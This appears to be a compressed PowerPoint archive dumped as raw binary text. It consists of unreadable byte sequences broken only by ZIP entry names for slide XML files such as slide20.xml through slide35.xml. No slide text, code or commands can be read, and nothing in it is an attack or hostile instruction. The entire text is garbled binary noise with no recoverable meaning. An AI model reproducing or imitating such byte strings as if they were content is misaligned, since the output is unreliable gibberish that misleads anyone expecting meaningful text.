)`G..>..!L'.]..2...P..)/...#.    ..<.|...t.......?8l.H......d.......`..[......uY......Wm.......6..x.^.C.I..../{Y..zN...I.....b.J...g<,.SJK...odE|.b... ....../2.w...t6.x...z.AD..;H....6kROr..X.2}2.4(....0.+.kU\..T|x}V.$..^...\.,..=....q(yGF.U..7X.3...rIh....C..DB..........9.......=....|...NJ...iZ....`2.....+u..Z.:C.
.yC.r`\.Y.;...Zn...,...LOb.-..ybZ.....)e,*..L.........].V...X.lt.g\-\t....!........Tz}...`
on.|..E)?..l..@.qR8+....Y1...i.W..[1}_8...s-$Hy+.......]G9<.q..b.]..(]*5.`.F...    2...Yw.7U...k.|!....... .K...U..pfW&l{...*.!..T$My,..E......c..?=..<]....0w....A.k.'..Q...~.........).._.O.Z.I.. .#.    ...ZB..~.
.j......R...`R..k..j..v..?    ~H.O.......a.. ..H.ky..P..c8.4.&I......'E..`..'...+p.#.E|m?I...K...%....xc_......X.v,..."..A....|....'0.4..Oi...Q.s..1...@^9V:+x.kM..\..........s...1.6...D..v@.G...E`.Z...b.;=e......m h[..K.D(.........3.........G..4..]5..{.].d...h!..8..J.Jb....[./..Z].|/..}..1.U.....m4....D. .....%!l.z..Y....q.e.7._I..8......A41G.J.....kd).s..!W.L.LQt..;.Y.m...M.....m..6......nf.F......`,Nh+.E.bC.x....>h.....N.D.u2.i."..b.vH.#Q?..>.8.........b.......b.y......9~....Y..l..o.;.$.1...&Y%.........l...Pg0.....i.."<=...I..06.b&p...c.rwPV....Xf..\f.....5t%.ly./...~..5.fL..`.......uma...6.F.....i..........<V..............<.$..4.k../..........&.....jY..u..f.Yy.
...
..ao.......?..U../.r.T(..*./LE.Z^.4.....O{....Q.........6..n3..i...*...{..%7.....ui...
.J..V.Y........P.[s...~.    i..U..5A....o...3..^.....7v.m..)........._.m..w0....ya...Mm]3...qq.-Z]F..._k..    2]...P...7Y...lb`Iw......&..R..jk.t;^GV.,H>!.|...$....z...r...@....2.....a8.....N............^...+..tl.6...../......v..^.M..r=x....2Q..Y....J....B.....f..)....JqGT.K...9..Wi..^.    ..6h.o..+^.._.e    ...2.T.Y&K..|.b..'1PS.cK.Y....r..q...+9
.8...    ..\8F*./?..$}..R.`....7...........Q.2....i.......>..c2..qY.\..]...L...x..%xE......;.g..F].A.I.[......7m8O..g..."...ji+..J..x:FR.._.Q....<.......[../...
w..+-.~..9....C.e.SrJoa'O.DF..r.r....`s    E.......wPZ.
.T99^{!Z`I.90sq.............9**n.l . ....1............8.....~..$H.x]....%.,.u.<.......(77,.....X..u3Y...^@    P.`.H.-..3.U..Rw.K.i......}...RvHs....>xX2(.....5..8l..Z.Y.*z...x........v"..\..2...MZ....j.^...$.PH....Z..z&./A.|.b....l._8...P...b..Pu.Q.);Y....uD.....>.....I..P,el..."........_.;.V.{.y5..$UtWk.....a...z4.....GlR
a.0...m/....2.g1R..(....m`...&6..../..p|I1../t......k&P.'T..].....u.*7M.../.....w].'9!1X....`.... .AD....ky..P......5xl.._.!x..............a.T..c..S...vP.H...)A....6j|.....C.A.....!.+.    .....    ..v?..dd....4.Z    .T..<A.,Ti...H.....#...5...X..<..4..j.....q..w9W..........j.D...[f.$pa.u.e.-.!b..m.|..&g..;V...L......q.m...F...z*...r.`75.!.....:@.......wT.:...F.,?..1q../....vxP......)2..@\.D.$d..FD..8....|6.....4...|.    .......B.,tYL.[.k..a{z...D...c6_.w.\.Rk...=q......w?..a...j.(..9.m........L{KV|.:.v..sYm..:;.K.u~-...W.D.X....a]..>...R.?..
.p..R=.\.....|y..\..M.........C\...a..Q..._...~8<.Va..Y.&[`.......3.."}>.S.....#..1.<....\Ud.\2.Y.\,....s-N00G.8'Q..........V..U.........hH.Wn...v.Z....r..m?.<...].........#v.2n?......_...9e....tEk3..v...kq...L...L......--....T.....Xe...6.iLBd(V.B.."...6..........`5Q ~.!p.......*"..w......P....`....#.clg_1..#...>....%!c.}......w.d...G...u..q.S0.....I...pN&~.F..D...`....G.f..d.....x..aGT.....E. .F    ..Qu.........#.......y......4.....8..w..<..@....e8...S    l.E....._...K..s].]L.(.[....)...gg-:..=..Wi...1>\..0..E..q"....d....u{..5..6.e.CLA........q..y~...A{....}....P.......S[.Q?...^.#..Se..bhl./..r%..tbKH..5.`Ao..w...w..k.&.x~T.......,.Z.nP..gx...z....S..=Fyt..Q.Lr.nV.`/R.rBE.z-...1?n.....k......^e5.O.=.e<.........v...5....,...5..Jh.S..(..N...T...U......`.e.'...h.SZDib.Y4.pl6.8}(0h.....q.~...(.....^:..a....'..m.G..Q..D..E.d.=.z.....i..Z..]\p}#.BjG...9..W!..sg..N..~.r'.....n...U.Q.?.
M..8|.*Zr..=.o..4.
...._C....v.@    ..$..+%    ]..i..].....T.~x%.....8N%M.(...vv........dK..&..m>/.T.E...o.77..v.l.......9v.m_\o....X......$`.p....v4./.7.........L..1^.....V...L., ..i.xh..6.c.+..|.v.....Q.6..I...,....."....h..q.~K.cqlg..2......@..
.w<.s..@.pE....K.W...{.'..?8....\.fp..=_@.xqO.{%<...0..%....E....{;.8..........FY.......2.....0...<..s.....>^N..r..r..........p{=.U........,.#>)...C.........p`fi@j.......3..t ......<......2?U.......#e~G.....Y......M\....-.;.6T....nn}.....(i\.-.U.B.....:..........[..+n...".-.....    ,..e:<W......[..htiVa1t........e..........,|..o....J./..).r$..\E.PG5b_.V?R.._..%.V........e'.V.;...A.TU.},..p.E...@.x..S..^.&t.......%.n...,~.L.....e{.<....-Kn..&}.Ws.Y......Uo.....@..yDk............PK..........!..Y......M.......ppt/slides/slide28.xml.X]s.6.}.L...O...>....I.e.i.0....E.T... .....i_...Kz$......h.;}.B...=.^I>'.g1'S.t$..U.+.a".a$n}...[j{D.*B..`.7g.{}..7'IG..`....{cc.N...1..>.    .x7.*...m9T..Vc^.U*.rL#.e..K...(
...&1.&5....+..(....%...4....K:EdA......b.....J.IO..W.."Q..<"h.X.r."...
.C.\.~.[...H..'..........b....!A..<....%c...%.........*.hI8.z...t...~...=F.N.0q)..4....0..1F.3.....P..4..j....X....y..Ld8.../.\.x...f......!...v.6}3.....h....v8..{L.......^.R..a....0...:6..Q$..9=.q|..O.6'.....2.a.*z..A....`.&.B..G.f..z>Z..Q.#..]......[A.E......j.%q...Z@.R.]..;.lB...Z.t...j.........Mb..Ap.<.!
..JY.]'..$......).........$.~U"=.O.].%}...v.R&e.Q.Lgk.6[M$.G......|..J........+........vj4...VE.:#.....i..!>...,..
.'.Cg....
L...S.....^}.`...hx)U..A..#.i..@n..%.=.....5...T.}}.....y....M.....U..<..71.Tw".{....%.Q(.\C..y)8+......o..<.    ..Q...HR...A..w...........7..T.Wp`....a?...^.82~.....7n.....e@y.~..>.|BoitMe...0....
.....s._.q...\.c%.....^8...3h.;...p....-m.....xA......?.>........R((_s....N..=O.I...?9xE>....>..Iw.....\e..(d.j..."=N.6.<D....d5...k.>H.0.
r.'T..r......Bm...kB#..V..Pm..j..Q.^..J..F.tv\o.Z..Y.....f....Hm#.X..>S..2a*L....~.......M.(.`...L.t.Tm..f.t../4....+tu.u...(...OC.P....J\j..PZ)&..@..u8..i..Q$".<.)........2A.l.......2.E9Kx...me............PK..........!...(B....}.......ppt/slides/slide35.xml.V]o.9.}_......S.....U6i..!...`<......!....=..$!..d...<...9......R..Nh5J.>u.....P.Q.}~....<U9.Z.Q....<.......    ....().7Y..X.K.>i..........:....Z.N..=..T.........`.J.u....X.......5..k.....D.=.....d....[..Jm..ff.6.O6SKD....h    X.N}P_..
...<._5.h.].r|N3.F....../.h....j.=......+....4......U......p..KN.....R.~......g..
.M6...sPo
.w......W.F<....F...O..B....M.I.g~'y..n......%..U.}..\X.1"....S.r...P..Dg.....Z.... W......^.H..........*.RK.../.M3........=.k...R+..'SI./...%...,r.h....`.c...]<.G..E...l..F0..(dEI....3..yo3....=.....V....X.....h.\.'...5N..8.....b~.WR....T.p....#.    .*58......RR%.......~.c..{...... ps.{.S....<.O.`...Yx.i-,..S.F..qR)..+.JMC.$^...]\jC...x.........m&..K}a.zU...e.......$7.I....8....uY.
}..<.......z.ZP.P^0aB.
..,l."........HA7.H}..T{..W.(.-/...ASBgR..L....>.......[b..j.4.....zn.L....:.{g...j.KLna|..h8..N.....i:8......iz:....].^.O..&u'w!r..Z..O.V.=....... ~.....m....l&4&.5.....<..e.2xzA..>^A..T9.FF..S...W...d...B.......5..P9_
%<O....f.(....@..W.N.Mk_O;Q........a    ..........PK..........!.....C...........ppt/slides/slide20.xml.W.r.6..w...."..zZ...8N.Mkk*.. ..1....d....C......$.p$..,..."....s..8.z..$Yqc.Vq..hD.+....q..~\.G.:..*..q..6z;....|heB.Z.!....|X.[......s...6.u.4.zb...f..j4...
....K...\0.^.e..+......6...../...na&.>pi...T&.....s..V.M>.'&...&...xED...D.r...>.....h...D....FWt...:....?......V..v.....\.~82.^m..........U.s/.......J....>[.4.......Ue.....)q...8o..W..<..6`Z9.E.s.C.....j.~...lv.|x7*.0_...n.N'.......:..M.F..2..C8..(..g=W.O..$...;......>Jj.hb..:N....^..].!..*.PC;i............4?........L$e<.2.....-. .*B."j..].....l].......C.J.Q;
..o..JD}.."...G..O..........s .G.)5Z.....tL3!.......]..z....2{.:$.2..w.W...EB.G.U..8..E..)..~....Y.....
$.........^-....@eh'..J...I:.4...A..jCbN.].Tp...\....@...zY.Og..r~.k..H.BJ_..,f7...E'..!.=....w.w.
na.x9.*..[hsnD.&.$.+8.vE.UD+.!3N(c.Z.......r.....%.=g9..bq.....,5.....:m6$..3..p...iW...$...(Y...........|.8...+.....}Y.......AX.:D-..zi.eF...`.;......#.Z. ..b.
.q....\z...:8...E.J.MQ.........FAr@.W:.,%...L.d...}I..L.[..MA{.]...../p..N.=#F..U.....~....^...f...t...A.W.u........m...*.........)...".Me1..;2.._~..'.    ...*...=1i~...*..........zk....m`........PK..........!...).)...}.......ppt/slides/slide21.xml.X.n.6.}/...a.*;.....H....IPg?..h.(E.$..[..o.h._.C.Jb.....],.....p...r&goV...0V.:.Z.....E*.<...^....c:e.."...Fo._uV..J    ...X.e...f..L..6.Rh..
.3..f.L....j.ONz..I.m..K...Lr....\hW.1B1..m&K[[+_b.4..L..ri.d|.R....F......rR...|..1$S...f9h.....X..!........F....gl.l.J"...O(..X9..G...g.{dy.n.t....<l.QU....]...N    j=..D.T./.O.t...~.._-kc..7_f..%.q..F.Z.|........."]{.S...HY7qk%.!p..`......P.....Ri\..l...`...n|.\.    RxZ....CH6..No.a?......v....x.(<Ld.&....iF7.q..*.....V.")j..0.I....i.u.......x...i6h..=/...{.>..:!l....
n..Gb...Z.$.D!..+.!.F..C...$Q.;x .^....)6..It.1Sh.Q)...Y..p .9..pI....bn...)S9....{..I..r..ap...x........%.r`.. ...c?..g.......T....W..*.N.p..Q...c..i(3.../.O^v.. g.....#.(..8.n.{?5_......O........{.j...../..n|.4M.1..."....^SZ.    a+.......mH:K... C{....U.(,.qL2.e..1....I.dh3.
..$B....~.8...1.:.C..,A....7$b...)...1H.....A........+.....GJ^...
.U..wG.e.. %...5=.......}...jy....ug=Q2.t........]+f.z&9jj.l..h.....@...0...;..a...`x9v..a..c...........V..w..A|>...~...3|....N~.6....5...........VX~.i.........=..0.Tc1^.I.+..+...*....u.>..To.."...........PK..........!.f...............ppt/slides/slide32.xml.V[n.8...`.@.{\........M.....0..$."9$....0...u%=.....I...DQ.}.s_'o..`.2.Tr....E.d..R.....Yg.1....P....l.v..o':."c.-m..Q..N.]..Tq.Fi...R....&.f..@j%....a.......%..jU..N..........r[.....K.iC.b..=.f.,].....4D~%7..^..    ..7....xEL.
.D..Gs,|J...{.z.J..ve..    O...N#...O\.    m.K...n7->?r6-.?r..*...J.W.G.......u..R...b.[..+.">...2..o.:-p......xf.v.}z.iuyH.v]0.....NPs....j.[@..t.?U...\..6y".[.......    ...v...F$;_...J....V.T.G.7(.......    ;.d..5..~R..5W~..e.nRn....e...3...".i..............zz"$."...    ^=F..`p<Bq.Y.......\......|F..I.x.|.6...I.b-L..1dP....D..PN!..h:(..`.i/.    US.,.....:.B....|#...R.....5........YVq..f...3.....Zg..k....t..,'.q<.)kp...dv..{*^.6...1W.-_..UmJn..,s....f.....v,Sd%(./fm.+..
l....R.W4+G|.3.d..._..i.R..."..eF.|]].a..S*....<_...... ....4.k..#.....Co..1,.m.+.~~...7.....q'..F..d0..'..3........*.?Q....\..G{...Z7~.....cP..?........C=.a..x.0....    ....x..-.I.....Z....~..O|......h18`..........5.H)3Z..t.1L...L#I....*..z....r>.`c....E.U..K.=........PK..........!.]\?[....5S......ppt/slides/slide27.xml.\Yo.8.~_`....]`.X....A.N...#H...P$..Z....c....+R.$_...{...dQ....*V.....q.ny^Dird..-..$H.(..Y..?..,V.?    .8M..........]vX.!..Iq..Y#!...."..._...O.l..c_.6.........i.:.c?J...|....
..4..y"........Q...Z.
.,......C:....8..Ev.sNW...yv.].......E!..b.?..X......M....S..5%..~.........?....../...^.@}.T....s....9..t.....f.f4;.GO.:.1g...j...Oi..`I.y...../......g#&.2.. Re;.P..n_.5..5+.....y..s.~........pC..4@^.....i.>.b...d....J<.\.2..?....,.}.z..}....ydyD..Q.$.X1.g1..)%...Y:.O.(PrH..r0.(O..?./W.....`.z.r*..KX..<;K...f....Q..<g..........:...'Y..P%......*...-j.\,tz...3/
.Y......A....#.."U..n.    @0.x...o.......?l.%|o...x.w.Pc.......05.....p.G!g_&...A]$..$B)5............@$aq$'    ...ft.............e.z'..i.......^o...v.............g..S....n.VOk0..c".u....5}.H"l.&...<.q.B...*....:..|./.V.#..*.....SNK[...(0#...r.a...w...].Y9F&....T.r.e.Z.$.........p....%.(.p$.....8g.~|d..$.V.F>$U~...j$0oH4........%..9fi.!..%3......Z60.2.o......q...<.1fU...K...3+.,..Y.....I0J.
."W...T.V..C...h....p.H.5.J...E!.N.4.N....Z..U.Hn.m....*y....j).A^.!...x.A.....R..~...0Wj.+.{_..Y.NB..J...K{...j.`......*..4*.^.......&F...aD.t....f.....mv..hG...4O.....o....C..u...Ft..j.X.>
..{.......-..............Z.@...J..XLm.k....o.PE..6n.Dn..M.......8..._..s..f.I...Q.M=r..W..G.j_..........j.Ql.qEx.....P5.8.X...D&..Umz?..o....:m}.
]s.v.Y.......z...Q.M..    ...    ......A..l.{v..1..j..    ..-..HKmP.'.-....N._U.+tn...rh....#....n.).e*t.@.|.....m...>.Z....UR.k..U)...w].X.Y.'.W.<..C...GZ+A...E....N&.!.2...I.`6H7._......V.........|..M.....0............4.;.."hBn....7..l....f.`l.gK.B....f.q.....?q.bS.BI...............c..{..t..Te.l._%.]..W9...$..(G....Z..re....z..#....t].a.`.V.Jn.I.(...=.Bz...x@......%....d......w.G...yz...vh.m;&b..W......].{..C..U.b.........2L.Eh.c..9.'.[.q...._...o.L......H@.....j..M3......[.......B..I3....jS.Y..Y....Koi...N....#..eU&.U.j"O...K?k.....kr............z;UJ...........RE.<i...E>...y.l.D.S{}6B. ......5.J.M.x.....}NC.ec.Ri.n..v,.XROe5..oQA...y]G''+....2jS......3.....Om........l#.D..
v%.........b\...<.....6...b..:.R3Q.3.... .J.....l6.X..S.d]..JP...W..].G.\..M....-....|d..g..;...BPB.v9.c...zK8..f0B^.Qp...m.&.z..$z..4.s....zWa....+.._....,....=.
n#...+.w2....3..N.-=V....^.`1.M.........y.V.....t..l]@...-...;."e@C.y..>....g?.z+W
.;q..5..(.i)R~4....C......H.4.E..e4.N....0....(    9.OE....Q.$.....E.    n.ro..2M.0
...8..T...NZ..<G    ...'HT..GV..w.F.%L.L.U.t...........Sp.GLQ0*...'..r..M.B.J..S..Z.f..L.z.2...2.pJ..XF.Iuy.U||/.L...8.F..q..|~5.Q...f..0.%...#+...q.|?..l...0..K.    NG$r.. A-Y....Z4'_....HZ..R.t..9N..C=......
...y....).....X.V..FEt...x =0..7.E.VOH.j...._..O..9'K..^...W.&...._..v.g..i.U.v..F.o.^.0.. 3S@r..o.......i........o............p(M...t0..I...~.O)&.6G.]....].o..Z..A......B..5.{j..=....a(..rZG...*..jG...v....4..x...z.F.
..=.aA.F..F2...........(\0L..#:.....#..#^K............)A.C.y.........axG.g....s..a-....[.v...jr.FB.g.....W|B_I.E.DA.0\.......*..0....]..x..Lf...}..!.Z......O~&r....#6!A..j....Y..W..t.&....V....}x.5.........rF<".....xJ.\.TSr.W..Q... 4.>.S=..5..F...]...tm.e{...S......o..%....t...mV...<+x.tW......s...!.J.......k.;......:.C.........>....g.[_9*Onf.5v.2%.<.5.lcw?..o.....~U$|&;....>s~;............*@K...c...P..1....MT..&U
4/....m.I.*zG.{.%5q..XG.quQ.4uL.BH..=E......14....A.Wj..iq;*iX..Z.....-...........K.K.. ............PK..........!...s.....z.......ppt/slides/slide26.xml.VMo.7.... x.M......*p........g.Ky.....*R...........DjR..rYQ..q.q8o....$;a]itF...J..&/.]F.n..sJ.g:g.h...p....o.....`.v).h.}.....B1..TBcmk.b..]?..=P....d.W....o.d..nK.^.^+.}.b.d.....\.V}    Ze..L....9".k.._Wm..a.w?.j].l\...,)s.E.f
..~......f..?.~.!.t..j~.R.F.......&...'.......>b...G........!.&.O..v.lJ/..|..1e....w.h.8C.Mx.j.....|U.....P.]......8.d...&?..o..'Y*._.......R....%..*t......>rD...).r.....k/K-.@..m..B.+f..I...Kq(.....a.4........FV.qQ...K....2G>t.. 3..QZf.Y.4.5.$    ._..>.&..0L..h....l2.W.A........=....z    .b*lACFB    .....*=/.L...".x...>..w...3q:...:..?".6. .5.R.....r.j|B._......+..%....kx.\QW...x.)........N.........~Dn-.R..y..'E~.*$l'U.;...I..y.S^........."'..}.....rY.......J..+.kY..\......u>VO....>J9._.......R3....:...
.u4..8x..n...V......p<9....io<....g.io:^^.f/...$.....B......O.E#.A......Q..+.?.o...5......oXu....M(.Z..
z..`zo.Q/..B...k...]..f.mt...5*i.s.-u..%..=.".Z.mF&.\l.NG....L.H8.....8.q..........PK..........!.0D2.............ppt/slides/slide30.xml.VMo.7.... x.M......*p..(.....gz.......*R...........DjR....."..3..ys.|.$.q.....<K(.:7..w.}.Y..)q...I.yF.........R'.....,...U.......g...k[c...k...e...d.$..bB.v....f..9a.Zq....%.....r.Z.9h...0q.....,_."..jc9.#...V.je...ne.(..%.).B..Bk..j.a..`.]........K...g......X.....d~?...Gl.....~w.<xh.....p.]8..%'..Q5..[_...#. ..~.^~...B...*.?T`.....Y.|t...F...;S.B.....,....A.H..f)..........fMI!......Br.\ni....K..........b.,.9    .Bc)....s.6...p.q.0.#..J...F.....cT......d.~>H..,9K.&...$...~...d0..I..m|6<.MF..:..ws.......T`S/ACL.-h...(.....V....)!q*R//.u..q...^`&Ng...[.Z.G.......Vr. ..[.W.O........~.....8.y..+..z.... .2..........gh.....Q..".zu..G...T...I!....[Rpe....;&..w.&.?/.;c.>..(...CS.N..W.2.$d-E..U.n....X...t..(eF..h.._2.s......    ..+p..P......E..Z._........7.....l|.......xy9....G..7.v.D...Q....5MD..Qr_8:..q...}.r..~.v.`..kV]..#C....q....4....i.
......C....a3.6.k....Z..o...S.....2.9.rd.)......1>.`...[.0j...7;........PK..........!.[\.1T...P    ......ppt/slides/slide25.xml.V.n.8.}/..0.....\..E6i...........(ErI.....CJjzI..A..."..93sF..w....AY3c.......T.f..W..cF!rSrm..............$h.P...bt.p.D%k.^Z'.6..<....K.oa...........N.?F.n6J..+.Z....R....J..[s.....0...........;...2.../..n....v.I.....5`a.......bX..S..-.b........v3....    %^.]$.n..]Q..GVTo.....p./NSTmD?.3..Y..%..D..r....S c.g
.O\m{c).d.U.....d..k.3..|..................2........q<....B..\/.......:.k.Q...q......U.|9Xp...5..'....&V......O.]D.:..P...t.`......@.l.~..I.w...BVV....i.....'...n.5....!PPQR.^...#O...q.4 ...\.-...lF......"..rX4.....qX*.-n.@qk.{V..V...T..$..p$VK..Dd\.......v.nU...\Sp.~. U..Ak.*..zIvC...ke......r'......j.i..K.JIWM.F.|....ud....0...y..i.....$5k.....C.D....4..............h0=....N&G.........rrx....:..nw/..@.-u'......\'..........\,..,......\....^.y....5....~U..4..y.@..E...[.~h.~9.).F...#.D.b.....*..r........`..<v...s.%2;........PK..........!...}(....4C......ppt/slides/slide24.xml.[.r...}OU.a..[..$......,[.V..*S...!0$....0.%.T.C..|..$.g0...(ZRd.^$.........|...<bW"..$>.X.......a<=..ry.7..L.8.Q......:?...O...Y.0...C~..I.8<8.....l?Y...&I:.....A..kH.G.v..;..0....m.'.I..7....Xj!......Y.....6.... F..M..+.GQ@...e*.=.W...hq....W.)...W..|.m.../.f.c.fx8ht..I..f..._.C....u............_..........mK..3.fP.J..+Z].m.s..H0.X.n........8.:i.zy....Fk&........$Qy;.R..i..=5.m...w{....C.u.]..m.e..}.i..........$......:.~.er$o#.6.[..1a...F.P/.._F@.?.:z. L.:....i$84%?$y<.n.........F3.j>Z...E
=..Z.y...r..,.Eds...w...;o....\.r...L4.).........Q.#....+4. ...5..Ea ..r>.).../fI...!..,.....0...q....R....h.eo..5.Y..X..(.e..5...n..s,...............g........J...c........*....[.....k.l.....|.>hh
...NCmN...aY.a.S...m[.v.ao=......q...40.p.f..H....:)..v._...|.y...89..../MSF&.^F..1.8...E..4J....:...S.~5......`.^.CY.%.$O0h!;.@..*[O9o..p2.....M......FN...<...M@.U.#..z.....l..R..&.....Y.k...D..u`..h
S]4Z.LV.w=.{.....%8.5...!......o..U{`AA.+......Xu..Wb...,.    .Y<.T...]...........Ad.....s5...~B)}.J.X..].K.#...&.}?...q n.gr^Z$5..S'~o........{...z}s..|..V..7......3..?.....3?....l...W...m/...9....\.....}......{Fk....A.k.......UM.F...?..s..........24.....j.lm....c...#.p..........a............1..r......Eq9|...Y.bi....eP6]v.d.....,J|........\7...=...2B..M....=,...Rx..#,.......M4....V.|....
..[...A.G_.1mt.^...<\C.}.a....l....T..$=.y....8..?.W;.X...j....8..:Y.y.Xy.v...mW.....9B.... ....4M...!Z}.h.    .....h.x....6..*N...F.`{.v.#.T......`...5-....\{./8%..q.z.J..W....S.&..fF0;..fJ.-nao.qr.N.8..Bv.-.cy...V$...Nj.4A.....Udd..._).D.....P..}k...=2..3......P..a.b.Nivi.i.k$.~C.b2...D\..!B......r.M...F1.>.8..U..,A....k!..v.r.>    ..~..I.Fo. .L.O..:.Z..`c~|[Gc..&f..fm......X[..e...I....,Q.".]..xX.h.@.h...y+8V''.^.z..Vi.5Q....,y...p^U...F..[UM..r..lw.b_..N.v.v.2. .#..t=.Q.o.3
RxA........*..m8...g.c..w....M.../..y...]....+..t.Xg.9..D.b..D.U....:.....hn.....E...y}.Q....-$....2
..JWL.b...~.T}..p:....h..z+.`es...f5._..1"......&.9.W1.Zy.$.u..w*Q...@.....
....|9..i...^............h....L.sk.Z....JYD.U...B'k........t...^.T.Qu.896..c.p..6..5.l..C...........r...r.m..y
e.O....1[.....e
....u.^E.WN    e...f...._H_C    pcr..96.D=...=~XR...*..R.*.B.cQB.5....2x.....y.J.:N.....92.C..w...P.Ct...[.....1.fi.Z/....P .`..x....hr.)..#. .}...(B...55.....=_.|..e.(......HN....e..0.(~......a.....f......,Q.D.+.0.%..@.u..O,P...H..K]K;..$....Y...Fj&~g~...4E.Fqz....(........"..!.!.,{$~o..1s.ct.C.5j$U...EA.N.&`...a{+...ToY[Ic.X.mG.6..v.il........o. ..i.....Q[...-.:.D...|.....U.V.........n..l1.L(...g...6.8SgH..-..e4..%.a..T.E..../..e.*!.....o...9...36..U.l.*..q......xY..:..fA2Q...W..Ua..RT..{......\.,...g!..    _j...(..    ..H.    O..p?M.....fH.z..R{.iv.,s.&...5...._.......i.......{.......p.........%..}..g......KW*.4:.M.....R...."iU...O....?.Q    .*H...T.M..`...=.I..)<..|M.7.O.........~...4Tg=*.!5U...@..'a8d..%E..c.......O.h..2.]g4.u....'!4.....    ...w....{..a.....|.]...O...d.........lq....?B.{....;..(...T\5#o.J.u....p.:.G.I....##.S.?. .v:jQ.J..5........bt.1......qd..x.(.V...]._.W.../...Se....S1..h..4A..........PK..........!._=m.,    ...+......ppt/slides/slide31.xml.Z.r.8.}.......c.*R.y*.....cW..;LB.g!..B......4HJ.)...IU.`...K.......n..].U.e1v._...EZfy1.;_...b......e!..........w......E=.cg.u5...............j.5.U..L...:...`...y^8...)...I...2].E..$JH...z.Wu;[...*%jLCo.m..'K/df......<......:W....s....rX......|............L|t;Q..w|..........x....f..0]~...z....=......nQs*{.....a..G.,R.}*.....W8.8)...(q^+..p....R..L..6.........H......
......g.$q..k.y{.NPA8..HZ{n..x^.Y.yId....n....U.......PfwF.W.K..#Y..}'..
y...._...1..(..\.4.3v.:V.r.IM...C)8....>.s^Ia`Kx{.mh...T..9W.s..>."'.o\..a..[{.<Z%oV.....=,....s.S1+e&.....|.n...m..t...K........juC......C?.    :->...`.(^.U..v.~...(..x...bW.\..dW.../.@...xU.;...T.5K!tU.'".....K......3.>-.W......i.Z3\...f...WZ(.Di.@$B.m.D..F..-....&p<.}...........?...0.{.....A.....Q..N.4.9z.....}........].    K..7..k.e..3.%...s...HW....k..... ..9-3.0_..$s.%E. v.!Q........=.0.`.[..&I..k6    ..Z...93.cG...J......!F.u    E..R.?&...R.k..KXO.-...).v3v...i.m......9..d>.;8.!"..qf.......>..eA8..G.......&.."...sR.........S..n...*|...h.j./.-.\.*........1.~.j...4/D.B......movE..I..N0#.........%........[..k.e.........I...X}......i\.!..mm...%...Ei`NZ{=zU.h@....=.?...:L
....`n.Q....1Vto..X.gx.3m.I...|6NB..F-.'.....o....=w...8.7......G ....K.........m%.'$/..._..*.....E`..-.kiI...A4..te..<.a.J6P.Y.    ...b|.4k..g;l2....8q.(...*".k-p..U..........7.Ys._..p..mV......;8..lQ.].8.Wz.f....F...U.Uy{.s.........mK.-+.C........D.?-...g.P..).3..^........0......eq.%.?O?.....A..D.g..[/.6.N.X/.2o.&.8A....t./...\Z.......SYo..~.H....j....b....+.2    ..,..*.nu.7......teL.u.....1a.!........L....9r......u...w..M.s.oh.....R.s......O:.0k%.&`.P.2....H..v..i..,.eg.j..6.j....
....&.....L...MR@~.........i..6'.+.|E.[...:......./^YQq.*..7A.....\7.p.KH~..Gg.....
a.d......).=${D>o.d7q.(|"?.....[*...$.c.....l.c.....D....
n....eQe\..(.v..Tl.(...bO.^.Z..D{.E9/NB.N..$zx.....w..9...$}~...U.ZIeK..;...........8.U|.^DW.$..>..7..7a.O?h,.I.. .9S9*..'.8.];.?.OOz.y...........c............. ..&.hA.....?Q.........|..6NW+^...Idl'h.:...~....:.....-c.m<.t....isU....d....9.K.(...$H...$...^......I......xT........R.8....7l.`.....MhFOp...n.....o^..    ....../wo..h..^..E..&..].....! +..%i......%....orc...D..r..{m...)........~.JK_......niY. .<.;._.g..Hg.....n../........._.......{..(....c..T.<.Z_`..sDQ[..l.?..^.....P<.M..T..:.&.....X....
._.f0t9.F......T...<T./c.e.v.f.T.."...@.......?.....\.........m.+.L......Y....:.?.......PK..........!.a[.W............ppt/slides/slide23.xml.U.r. .}.L.....-9.hlgri........."..(`.N......I.6M..    .....a..mj...X.......1IU...._].wF.YGdA..l.......7..[Q X-mN..rN.Ibi.jb..f.........I
Cn...I.....p....%.UYr...].L...0A.dn+.mD./A..Y.    ...4.ft)
....0.Gr....^..{.^.....#Ij..'..6,|J..A.d.MD"..4.lBr..6S..o.....m...$}.....XZ..... ..M=...s:i.s..`.w..    %...._,.
xz.=:_G0....
...e..j...A..oA. ....b.._.;L.\X.t[.. .6.... . ..Lv..........;....[.......&Y..E.DKp...L@...i1.,....{.=U.C..L.....5....J:p.Z.BY.D..J.Na^.?b.....zb.....`.Z.R?..G...t<...w.p...Y.`D
..:G%.}...d.I.~W}f........J.J.?....n...#.=.j....*.6........u.U...M.....!..$Y.J.~..8.(.......h....C.U}.....(.AcGxU.......wS.u.....o....    .../.^.JJ..|............z.N..u....3...g...y6.~.m?.....v6.g~i...4i.P$../.S._t.p..K    .....|".b......:S..\....!...........PK..........!..h.O............ppt/slides/slide22.xml.X.n.6........bE.8..?7N...P.I.&..i...R.JR..0`..bw{...^a.)).....f..).<<.;....$.d...J....v@..T....|.9o...X*c*.d.`.L.........1.ii...$.f.f.D    K..R...6P:...z..5..j*.....fJ.....1..`.#.FEy..-.h&...&....e...if@...c...E."v.&...........J....+Mx..."i
X.f.....%.a.\8>.(..d...C..ld...........%Q.2.....5{...fw.....^..*$./N....[.H.V.b+..w*.d.T..._..].*bNfG>K..f@.:R.......o<....H.;{...Gk..b9..~.}...;dZ...]..+qA9........>..FhW.{m..y...v.5~.WA..3..x...k..'&...Q8I..=..j.c..'Z.../... .{.Q..&J./,&.JZ..!.....:&.+.....:xi....J.,...c..cy-..4b..`..7.*.a....N.a...R.ax.S....5_z.L...R.s..
..47...1..}5.^.(..h...fws.;.9p.h...9..?.a.Th2......[c.....s=g`R-Z.C..s....9...oF.iDw.......i_...^C...d.........3..y..hzC^..N]-g..M..M..s.^....WV3V92..%..`/.4.... j._xv.s.....^...20..R0..J.    .d.*mw^.O....9..aP.N.....O..3y.%.2.6y......%..2|.n...B.O......a.[.M.....4W.&LtD-...7...S_.Ir.Tj....5.............lk........X4.k*.^.>.MS_G.P..._.?....~.m.....).9
